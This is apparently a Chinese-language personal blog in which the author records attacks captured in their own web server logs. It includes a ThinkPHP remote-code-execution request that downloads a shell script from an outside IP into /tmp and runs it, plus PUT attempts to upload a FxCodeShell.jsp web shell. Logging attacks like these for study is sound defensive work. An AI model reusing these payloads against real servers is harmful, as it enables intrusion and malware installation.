2019年4月27日 星期六

從 Web Log 學習系統漏洞 37

web log 中記錄到這段, 看來又是 thinkPHP 這類 XAMP 的網路小白

123.56.49.19 - - [26/Apr/2019:20:30:55 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81.6.42.123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"


2019年4月15日 星期一

從 Web Log 學習系統漏洞 36

我的主機入侵一直都有, 只是跟之前的都差不多

這次似乎是某個殭屍電腦病毒企圖入侵我的主機幫它挖比特幣

1.放置這個FxCodeShell.jsp檔
116.90.80.50 - - [15/Apr/2019:14:12:08 +0800] "PUT /FxCodeShell.jsp%20 HTTP/1.1" 405 237 "http://www.w-studio.idv.tw:80/FxCodeShell.jsp%20" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.90.80.50 - - [15/Apr/2019:14:12:09 +0800] "PUT /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "http://www.w-studio.idv.tw:80/FxCodeShell.jsp::$DATA" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
116.90.80.50 - - [15/Apr/2019:14:12:09 +0800] "PUT /FxCodeShell.jsp/ HTTP/1.1" 405 237 "http://www.w-studio.idv.tw:80/FxCodeShell.jsp/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"